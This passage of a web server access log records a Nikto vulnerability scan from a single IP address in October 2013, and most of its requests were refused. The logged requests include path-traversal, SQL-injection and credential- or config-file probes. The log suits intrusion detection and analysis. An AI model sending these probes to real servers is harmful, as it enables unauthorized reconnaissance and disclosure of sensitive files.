  553. 84.56.69.222 - - [23/Oct/2013:15:28:07 +0400] "GET /administrator/gallery/uploadimage.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000200)"
  554. 84.56.69.222 - - [23/Oct/2013:15:28:07 +0400] "GET /pafiledb/includes/team/file.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000201)"
  555. 84.56.69.222 - - [23/Oct/2013:15:28:07 +0400] "GET /phpEventCalendar/file_upload.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000202)"
  556. 84.56.69.222 - - [23/Oct/2013:15:28:07 +0400] "GET /servlet/com.unify.servletexec.UploadServlet HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000203)"
  557. 84.56.69.222 - - [23/Oct/2013:15:28:07 +0400] "GET /webcgi/uploader.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000204)"
  558. 84.56.69.222 - - [23/Oct/2013:15:28:08 +0400] "GET /scripts/uploader.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000204)"
  559. 84.56.69.222 - - [23/Oct/2013:15:28:08 +0400] "GET /scripts/cpshost.dll HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000205)"
  560. 84.56.69.222 - - [23/Oct/2013:15:28:08 +0400] "GET /scripts/repost.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000206)"
  561. 84.56.69.222 - - [23/Oct/2013:15:28:08 +0400] "GET /upload.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000207)"
  562. 84.56.69.222 - - [23/Oct/2013:15:28:09 +0400] "GET /uploadn.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000208)"
  563. 84.56.69.222 - - [23/Oct/2013:15:28:09 +0400] "GET /uploadx.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000209)"
  564. 84.56.69.222 - - [23/Oct/2013:15:28:10 +0400] "GET /wa.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000210)"
  565. 84.56.69.222 - - [23/Oct/2013:15:28:10 +0400] "GET /basilix/compose-attach.php3 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000211)"
  566. 84.56.69.222 - - [23/Oct/2013:15:28:10 +0400] "GET /server/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000212)"
  567. 84.56.69.222 - - [23/Oct/2013:15:28:10 +0400] "GET /webcgi/fpsrvadm.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000213)"
  568. 84.56.69.222 - - [23/Oct/2013:15:28:11 +0400] "GET /scripts/fpsrvadm.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000213)"
  569. 84.56.69.222 - - [23/Oct/2013:15:28:11 +0400] "GET /siteminder/smadmin.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000214)"
  570. 84.56.69.222 - - [23/Oct/2013:15:28:11 +0400] "GET /vgn/ac/data HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000215)"
  571. 84.56.69.222 - - [23/Oct/2013:15:28:12 +0400] "GET /vgn/ac/delete HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000216)"
  572. 84.56.69.222 - - [23/Oct/2013:15:28:12 +0400] "GET /vgn/ac/edit HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000217)"
  573. 84.56.69.222 - - [23/Oct/2013:15:28:23 +0400] "GET /vgn/ac/esave HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000218)"
  574. 84.56.69.222 - - [23/Oct/2013:15:28:28 +0400] "GET /vgn/ac/fsave HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000219)"
  575. 84.56.69.222 - - [23/Oct/2013:15:28:28 +0400] "GET /vgn/ac/index HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000220)"
  576. 84.56.69.222 - - [23/Oct/2013:15:28:28 +0400] "GET /vgn/asp/MetaDataUpdate HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000221)"
  577. 84.56.69.222 - - [23/Oct/2013:15:28:28 +0400] "GET /vgn/asp/previewer HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000222)"
  578. 84.56.69.222 - - [23/Oct/2013:15:28:28 +0400] "GET /vgn/asp/status HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000223)"
  579. 84.56.69.222 - - [23/Oct/2013:15:28:28 +0400] "GET /vgn/asp/style HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000224)"
  580. 84.56.69.222 - - [23/Oct/2013:15:28:29 +0400] "GET /vgn/errors HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000225)"
  581. 84.56.69.222 - - [23/Oct/2013:15:28:36 +0400] "GET /vgn/jsp/controller HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000226)"
  582. 84.56.69.222 - - [23/Oct/2013:15:28:36 +0400] "GET /vgn/jsp/errorpage HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000227)"
  583. 84.56.69.222 - - [23/Oct/2013:15:28:36 +0400] "GET /vgn/jsp/initialize HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000228)"
  584. 84.56.69.222 - - [23/Oct/2013:15:28:36 +0400] "GET /vgn/jsp/jspstatus HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000229)"
  585. 84.56.69.222 - - [23/Oct/2013:15:28:37 +0400] "GET /vgn/jsp/jspstatus56 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000230)"
  586. 84.56.69.222 - - [23/Oct/2013:15:28:37 +0400] "GET /vgn/jsp/metadataupdate HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000231)"
  587. 84.56.69.222 - - [23/Oct/2013:15:28:37 +0400] "GET /vgn/jsp/previewer HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000232)"
  588. 84.56.69.222 - - [23/Oct/2013:15:28:37 +0400] "GET /vgn/jsp/style HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000233)"
  589. 84.56.69.222 - - [23/Oct/2013:15:28:37 +0400] "GET /vgn/legacy/edit HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000234)"
  590. 84.56.69.222 - - [23/Oct/2013:15:28:38 +0400] "GET /vgn/login HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000235)"
  591. 84.56.69.222 - - [23/Oct/2013:15:28:38 +0400] "GET /webtop/wdk/samples/index.jsp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000236)"
  592. 84.56.69.222 - - [23/Oct/2013:15:28:38 +0400] "GET /webcgi/.cobalt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000237)"
  593. 84.56.69.222 - - [23/Oct/2013:15:28:38 +0400] "GET /scripts/.cobalt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000237)"
  594. 84.56.69.222 - - [23/Oct/2013:15:28:38 +0400] "GET /WEB-INF/web.xml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000238)"
  595. 84.56.69.222 - - [23/Oct/2013:15:28:38 +0400] "GET /forum/admin/wwforum.mdb HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000239)"
  596. 84.56.69.222 - - [23/Oct/2013:15:28:39 +0400] "GET /fpdb/shop.mdb HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000240)"
  597. 84.56.69.222 - - [23/Oct/2013:15:28:42 +0400] "GET /guestbook/admin/o12guest.mdb HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000241)"
  598. 84.56.69.222 - - [23/Oct/2013:15:28:42 +0400] "GET /midicart.mdb HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000242)"
  599. 84.56.69.222 - - [23/Oct/2013:15:28:42 +0400] "GET /MIDICART/midicart.mdb HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000243)"
  600. 84.56.69.222 - - [23/Oct/2013:15:28:42 +0400] "GET /mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000244)"
  601. 84.56.69.222 - - [23/Oct/2013:15:28:43 +0400] "GET /news/news.mdb HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000245)"
  602. 84.56.69.222 - - [23/Oct/2013:15:28:43 +0400] "GET /newuser?Image=../../database/rbsserv.mdb HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000246)"
  603. 84.56.69.222 - - [23/Oct/2013:15:28:43 +0400] "GET /shopdbtest.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000247)"
  604. 84.56.69.222 - - [23/Oct/2013:15:28:43 +0400] "GET /shopping300.mdb HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000248)"
  605. 84.56.69.222 - - [23/Oct/2013:15:28:43 +0400] "GET /shopping400.mdb HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000249)"
  606. 84.56.69.222 - - [23/Oct/2013:15:28:44 +0400] "GET /shoppingdirectory/midicart.mdb HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000250)"
  607. 84.56.69.222 - - [23/Oct/2013:15:28:44 +0400] "GET /SilverStream/Meta/Tables/?access-mode=text HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000251)"
  608. 84.56.69.222 - - [23/Oct/2013:15:28:45 +0400] "GET /database/db2000.mdb HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000252)"
  609. 84.56.69.222 - - [23/Oct/2013:15:28:45 +0400] "GET /webcgi/mailit.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000253)"
  610. 84.56.69.222 - - [23/Oct/2013:15:28:45 +0400] "GET /scripts/mailit.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000253)"
  611. 84.56.69.222 - - [23/Oct/2013:15:28:45 +0400] "GET /webcgi/search HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000254)"
  612. 84.56.69.222 - - [23/Oct/2013:15:28:46 +0400] "GET /scripts/search HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000254)"
  613. 84.56.69.222 - - [23/Oct/2013:15:28:46 +0400] "GET /doc/webmin.config.notes HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000255)"
  614. 84.56.69.222 - - [23/Oct/2013:15:28:46 +0400] "GET /error/HTTP_NOT_FOUND.html.var HTTP/1.1" 200 1004 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000256)"
  615. 84.56.69.222 - - [23/Oct/2013:15:28:46 +0400] "GET /oem_webstage/cgi-bin/oemapp_cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000257)"
  616. 84.56.69.222 - - [23/Oct/2013:15:28:46 +0400] "GET /admin/config.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000258)"
  617. 84.56.69.222 - - [23/Oct/2013:15:28:47 +0400] "GET /adm/config.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000258)"
  618. 84.56.69.222 - - [23/Oct/2013:15:28:47 +0400] "GET /administrator/config.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000258)"
  619. 84.56.69.222 - - [23/Oct/2013:15:28:47 +0400] "GET /webcgi/.access HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000259)"
  620. 84.56.69.222 - - [23/Oct/2013:15:28:54 +0400] "GET /scripts/.access HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000259)"
  621. 84.56.69.222 - - [23/Oct/2013:15:28:54 +0400] "GET /webcgi/%2e%2e/abyss.conf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000260)"
  622. 84.56.69.222 - - [23/Oct/2013:15:28:55 +0400] "GET /scripts/%2e%2e/abyss.conf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000260)"
  623. 84.56.69.222 - - [23/Oct/2013:15:28:56 +0400] "GET /webcgi/data/fetch.php?page= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000261)"
  624. 84.56.69.222 - - [23/Oct/2013:15:28:56 +0400] "GET /scripts/data/fetch.php?page= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000261)"
  625. 84.56.69.222 - - [23/Oct/2013:15:28:57 +0400] "GET /webcgi/empower?DB=whateverwhatever HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000262)"
  626. 84.56.69.222 - - [23/Oct/2013:15:28:57 +0400] "GET /scripts/empower?DB=whateverwhatever HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000262)"
  627. 84.56.69.222 - - [23/Oct/2013:15:28:58 +0400] "GET /webcgi/mrtg.cgi?cfg=blah HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000263)"
  628. 84.56.69.222 - - [23/Oct/2013:15:28:59 +0400] "GET /scripts/mrtg.cgi?cfg=blah HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000263)"
  629. 84.56.69.222 - - [23/Oct/2013:15:29:00 +0400] "GET /webcgi/store/agora.cgi?page=whatever33.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000264)"
  630. 84.56.69.222 - - [23/Oct/2013:15:29:01 +0400] "GET /scripts/store/agora.cgi?page=whatever33.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000264)"
  631. 84.56.69.222 - - [23/Oct/2013:15:29:02 +0400] "GET /?mod=node&nid=some_thing&op=view HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000265)"
  632. 84.56.69.222 - - [23/Oct/2013:15:29:02 +0400] "GET /?mod=some_thing&op=browse HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000266)"
  633. 84.56.69.222 - - [23/Oct/2013:15:29:03 +0400] "GET /article.php?article=4965&post=1111111111 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000267)"
  634. 84.56.69.222 - - [23/Oct/2013:15:29:04 +0400] "GET /blah123.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000268)"
  635. 84.56.69.222 - - [23/Oct/2013:15:29:04 +0400] "GET /categorie.php3?cid=june HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000269)"
  636. 84.56.69.222 - - [23/Oct/2013:15:29:04 +0400] "GET /CFIDE/probe.cfm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000270)"
  637. 84.56.69.222 - - [23/Oct/2013:15:29:05 +0400] "GET /contents.php?new_language=elvish&mode=select HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000271)"
  638. 84.56.69.222 - - [23/Oct/2013:15:29:06 +0400] "GET /download.php?op=viewdownload HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000272)"
  639. 84.56.69.222 - - [23/Oct/2013:15:29:26 +0400] "GET /examples/basic/servlet/HelloServlet HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000274)"
  640. 84.56.69.222 - - [23/Oct/2013:15:29:27 +0400] "GET /home.php?arsc_language=elvish HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000275)"
  641. 84.56.69.222 - - [23/Oct/2013:15:29:27 +0400] "GET /hostadmin/?page=' HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000276)"
  642. 84.56.69.222 - - [23/Oct/2013:15:29:27 +0400] "GET /hostadmin/?page=' HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000277)"
  643. 84.56.69.222 - - [23/Oct/2013:15:29:27 +0400] "GET /index.php?file=index.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000278)"
  644. 84.56.69.222 - - [23/Oct/2013:15:29:27 +0400] "GET /jgb_eng_php3/cfooter.php3 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000279)"
  645. 84.56.69.222 - - [23/Oct/2013:15:29:28 +0400] "GET /vl6UN.csp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000280)"
  646. 84.56.69.222 - - [23/Oct/2013:15:29:29 +0400] "GET /modules.php?name=Downloads&d_op=viewdownload HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000281)"
  647. 84.56.69.222 - - [23/Oct/2013:15:29:29 +0400] "GET /modules.php?name=Downloads&d_op=viewdownload HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000282)"
  648. 84.56.69.222 - - [23/Oct/2013:15:29:29 +0400] "GET /modules.php?op=modload&name=0&file=0 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000283)"
  649. 84.56.69.222 - - [23/Oct/2013:15:29:29 +0400] "GET /modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000284)"
  650. 84.56.69.222 - - [23/Oct/2013:15:29:30 +0400] "GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000285)"
  651. 84.56.69.222 - - [23/Oct/2013:15:29:30 +0400] "GET /path/nw/article.php?id=' HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000286)"
  652. 84.56.69.222 - - [23/Oct/2013:15:29:30 +0400] "GET /path/nw/article.php?id=' HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000287)"
  653. 84.56.69.222 - - [23/Oct/2013:15:29:30 +0400] "GET /pw/storemgr.pw HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000288)"
  654. 84.56.69.222 - - [23/Oct/2013:15:29:30 +0400] "GET /rtm.log HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000289)"
  655. 84.56.69.222 - - [23/Oct/2013:15:29:31 +0400] "GET /scozbook/view.php?PG=whatever HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000290)"
  656. 84.56.69.222 - - [23/Oct/2013:15:29:31 +0400] "GET /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000291)"
  657. 84.56.69.222 - - [23/Oct/2013:15:29:31 +0400] "GET /shopa_sessionlist.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000292)"
  658. 84.56.69.222 - - [23/Oct/2013:15:29:31 +0400] "GET /simplebbs/users/users.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000293)"
  659. 84.56.69.222 - - [23/Oct/2013:15:29:31 +0400] "GET /sips/sipssys/users/a/admin/user HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000294)"
  660. 84.56.69.222 - - [23/Oct/2013:15:29:31 +0400] "GET /tcb/files/auth/r/root HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000295)"
  661. 84.56.69.222 - - [23/Oct/2013:15:29:32 +0400] "GET /typo3conf/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000296)"
  662. 84.56.69.222 - - [23/Oct/2013:15:29:32 +0400] "GET /typo3conf/database.sql HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000297)"
  663. 84.56.69.222 - - [23/Oct/2013:15:29:32 +0400] "GET /typo3conf/localconf.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000298)"
  664. 84.56.69.222 - - [23/Oct/2013:15:29:33 +0400] "GET /vchat/msg.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000299)"
  665. 84.56.69.222 - - [23/Oct/2013:15:29:33 +0400] "GET /vgn/license HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000300)"
  666. 84.56.69.222 - - [23/Oct/2013:15:29:33 +0400] "GET /web.config HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000301)"
  667. 84.56.69.222 - - [23/Oct/2013:15:29:33 +0400] "GET /webamil/test.php?mode=phpinfo HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000302)"
  668. 84.56.69.222 - - [23/Oct/2013:15:29:34 +0400] "GET /webcart-lite/config/import.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000303)"
  669. 84.56.69.222 - - [23/Oct/2013:15:29:34 +0400] "GET /webcart-lite/orders/import.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000304)"
  670. 84.56.69.222 - - [23/Oct/2013:15:29:34 +0400] "GET /webcart/carts/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000305)"
  671. 84.56.69.222 - - [23/Oct/2013:15:29:34 +0400] "GET /webcart/config/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000306)"
  672. 84.56.69.222 - - [23/Oct/2013:15:29:34 +0400] "GET /webcart/config/clients.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000307)"
  673. 84.56.69.222 - - [23/Oct/2013:15:29:35 +0400] "GET /webcart/orders/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000308)"
  674. 84.56.69.222 - - [23/Oct/2013:15:29:35 +0400] "GET /webcart/orders/import.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000309)"
  675. 84.56.69.222 - - [23/Oct/2013:15:29:35 +0400] "GET /webmail/horde/test.php HTTP/1.1" 302 287 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000310)"
  676. 84.56.69.222 - - [23/Oct/2013:15:29:38 +0400] "GET /whateverq0Be.html HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000311)"
  677. 84.56.69.222 - - [23/Oct/2013:15:29:38 +0400] "GET /ws_ftp.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000312)"
  678. 84.56.69.222 - - [23/Oct/2013:15:29:38 +0400] "GET /WS_FTP.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000313)"
  679. 84.56.69.222 - - [23/Oct/2013:15:29:39 +0400] "GET /webcgi/MsmMask.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000314)"
  680. 84.56.69.222 - - [23/Oct/2013:15:29:39 +0400] "GET /scripts/MsmMask.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000314)"
  681. 84.56.69.222 - - [23/Oct/2013:15:29:57 +0400] "GET /_mem_bin/auoconfig.asp HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000315)"
  682. 84.56.69.222 - - [23/Oct/2013:15:29:57 +0400] "GET /_mem_bin/auoconfig.asp HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000316)"
  683. 84.56.69.222 - - [23/Oct/2013:15:29:59 +0400] "GET /_mem_bin/remind.asp HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000317)"
  684. 84.56.69.222 - - [23/Oct/2013:15:30:07 +0400] "GET /exchange/lib/ATTACH.INC HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000318)"
  685. 84.56.69.222 - - [23/Oct/2013:15:30:07 +0400] "GET /SiteServer/Admin/knowledge/persmbr/vs.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000319)"
  686. 84.56.69.222 - - [23/Oct/2013:15:30:08 +0400] "GET /SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000320)"
  687. 84.56.69.222 - - [23/Oct/2013:15:30:08 +0400] "GET /SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000321)"
  688. 84.56.69.222 - - [23/Oct/2013:15:30:09 +0400] "GET /SiteServer/Admin/knowledge/persmbr/VsTmPr.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000322)"
  689. 84.56.69.222 - - [23/Oct/2013:15:30:09 +0400] "GET /trace.axd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000323)"
  690. 84.56.69.222 - - [23/Oct/2013:15:30:10 +0400] "GET /tvcs/getservers.exe?action=selects1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000324)"
  691. 84.56.69.222 - - [23/Oct/2013:15:30:11 +0400] "GET /whatever.htr HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000325)"
